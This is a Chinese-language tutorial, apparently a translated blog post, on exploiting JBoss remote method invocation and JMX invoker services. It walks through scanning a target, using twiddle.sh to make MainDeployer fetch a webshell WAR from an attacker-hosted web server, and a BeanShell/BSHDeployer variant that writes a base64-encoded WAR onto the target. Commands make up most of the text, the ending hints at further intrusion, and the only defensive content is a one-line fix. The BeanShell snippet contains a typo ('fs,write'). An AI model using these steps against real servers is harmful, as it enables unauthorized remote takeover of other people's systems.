JBoss远程方法调用漏洞利用详解

早上起床打开微博看到空虚浪子心大神发的一篇有关Jboss漏洞的文章，对我等菜鸟来说那边文章看起来还是很吃力的，所以查了查国内外的资料，翻译写了这边文章，记录一下。

在JBoss服务器上部署web应用程序，有很多不同的方式，诸如：JMX Console、Remote Method Invocation（RMI）、JMXInvokerServlet、HttpAdapter等。

本文主要是关于RMI远程方法调用漏洞的，其它几种部署方式比如JMX Console，也是会有漏洞的，主要看JBoss服务器的配置是否正确严谨。之前也有一篇关于JMX Console漏洞利用的。有兴趣可以在本站搜索一下，言归正传：

Metasploit有很多的模块针对不同的JBOSS漏洞，其中有 jboss_vulnscan模块，路径为：auxiliary/scanner/http/jboss_vulnscan, 通过该模块可以进行JBoss服务器漏洞扫描，可以探测是否有开放4444,1098,1099端口。当然也可以使用Nmap批量扫描某个网段是否有开放1099，1098或4444端口。如下：

?

1 2 3 4 5 6 7 8 9

[+] 192.168.0.35:443 /invoker/JMXInvokerServlet does not require authentication (200)    [*] 192.168.0.35:443 Checking services...    [*] 192.168.0.35:443 Naming Service tcp/1098: open    [*] 192.168.0.35:443 Naming Service tcp/1099: open    [*] 192.168.0.35:443 RMI invoker tcp/4444: open

可以看到RMI默认端口4444是开启的，JNDI(Java Naming and Directory Interface)默认端口也是1098，1099也是开启的。有关JNDI的解释可以百度。

为了和远程目标JBoss服务器进行交互，需要在本地安装Jboss AS(如：JBoss – 4.2.3.GA )，使用其中bin目录下的twiddle和Jboss进行交互，在linux下使用用twiddle.sh,在windows下使用twiddle.bat，如下：

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

$ sh jboss-4.2.3.GA/bin/twiddle.sh -h A JMX client to ’twiddle’ with a remote JBoss server. usage: twiddle.sh [options] <command> [command_arguments] options:  -h, --help                   Show this help message  --help-commands          Show a list of commands -H=<command>                 Show command specific help -c=command.properties            Specify the command.properties file to use -D<name>[=<value>]               Set a system property --                               Stop procession options -s, --server=<url>               The JNDI URL of the remote server -a, --adapter=<name>             The JNDI name of the RMI adapter to user -u, --user=<name>                Specify the username for authentication -p, --password=<name>            Specify the password for authentication -q, --quiet                      Be somewhat more quiet

获取远程目标JBoss服务器的系统信息，用如下命令：

?

1 2 3 4 5

root@bt:/pentest/web/jboss/jboss-4.2.1.GA/bin# ./twiddle.sh -s 192.168.0.35 get "jboss.system:type=ServerInfo" HostAddress=192.168.0.35 ...... JavaVersion=1.5.0_13 MaxMemory=266600448

为了获取更高的权限，可以给JBoss服务器部署我们的webshell,创建一个war文件，可以使用Myeclipse来构建一个包含webshell的war,方法如下：

1、打开Myeclipse新建Web项目
2、把jsp放到WebRoot目录下
3、导出项目为war文件

构建好包含webshell的war之后，可以使用twiddle将该war部署的目标jboss服务器上，首先需要将war放到一个web服务器，可以使用twistd快速搭建一个web，如下：

?

1 2 3 4 5

root@bt:/pentest/web/jboss/fns# ls    getshell.war    root@bt:/pentest/web/jboss/fns# twistd -n --path=. --port=80

部署war到Jboss服务器，命令如下：

?

1	root@bt:/pentest/web/jboss/jboss-4.2.1.GA/bin# ./twiddle.sh -s 192.168.0.35 invoke "jboss.system:service=MainDeployer" deploy http://10.0.1.50/getshell.war

执行之后就会在jboss服务器上部署好我们的webshell,路径为：

http://192.168.0.35/getshell/customize.jsp
以上是一个使用RMI远程方法调用漏洞入侵Jboss服务器的过程，以上的过程也是有前提条件的，最主要的是Jboss服务器需要允许访问远程的HTTP服务器，否则利用RMI是没有办法进行部署远程war到JBOSS服务器。

然而在很多配置中，防火墙不允许JBoss服务器对外发出连接请求，如果遇到有防火墙的这种情况，可以使用BSHDeployer在目标Jboss服务器上执行任意的Beanshell来部署webshell。

BeanShell是一种运行在JRE上的脚本语言，该语言支持常规的Java语法。可以很快写完，并且不需要编译，JBoss服务器中BSHDeployer可以部署BeanShell脚本，它会安装后自动执行。具体的步骤如下：

1，按照前文提到的方法，创建好包含jspshell的shell.war；
2，用linux下的base64命令生成shell.war的base64的表示，命令如下：

?

1	root@bt:~#base64 -w 0 shell.war>>shell.war.base64

3,创建beanshell脚本，创建一个txt文档，无需任何换行符，保存以下内容到该txt：

?

1	import java.io.FileOutputStream; import sun.misc.BASE64Decoder; String val="shell.war的base64表示"; BASE64Decoder decoder = new BASE64Decoder(); byte[] byteval=decoder.decodeBuffer(val); FileOutputStream fs = new FileOutputStream("/temp/shell.war"); fs,write(byteval); fs.close();

其中val变量中是shell.war文件的base64表示，如果目标Jboss服务器是windows的话目录修改如：C:\WINDOWS\TEMP\shell.war,将txt重命名为：.bsh文件

4,使用前文中的bin/twiddle.sh工具将本地.bsh文件创建到远程jboss服务器上，命令如下：

?

1	$ ./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.deployer:service=BSHDeployer createScriptDeployment "‘cat deployer.bsh‘" deployer.bsh

该命令执行完成之后会在远程Jboss服务器生成shell.war，目录为/temp/shell.war

5，然后继续使用twiddle.sh将Jboss服务器上的shell.war进行部署，命令如下：

?

1	$ ./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.system:service=MainDeployer deploy "/temp/shell.war"

目标Jboss服务器为windows的话命令如下：

?

1	$./jboss-4.2.3.GA/bin/twiddle.sh -s 192.168.0.35 invoke jboss.system:service=MainDeployer deploy "file:C:/WINDOWS/TEMP/shell.war"

这样就会就会将shell.war部署在目标jboss服务器上，其中有我们的jspshell，接下来你们懂的！

Jboss远程方法调用漏洞修复建议引用空虚浪子心大婶的文章内容：

把invoker删除了，再把1099关闭就好。

PS:本文由阿德马童鞋翻译查找总结，转载请注明出处，TKS!有部分不准确的地方也欢迎拍砖。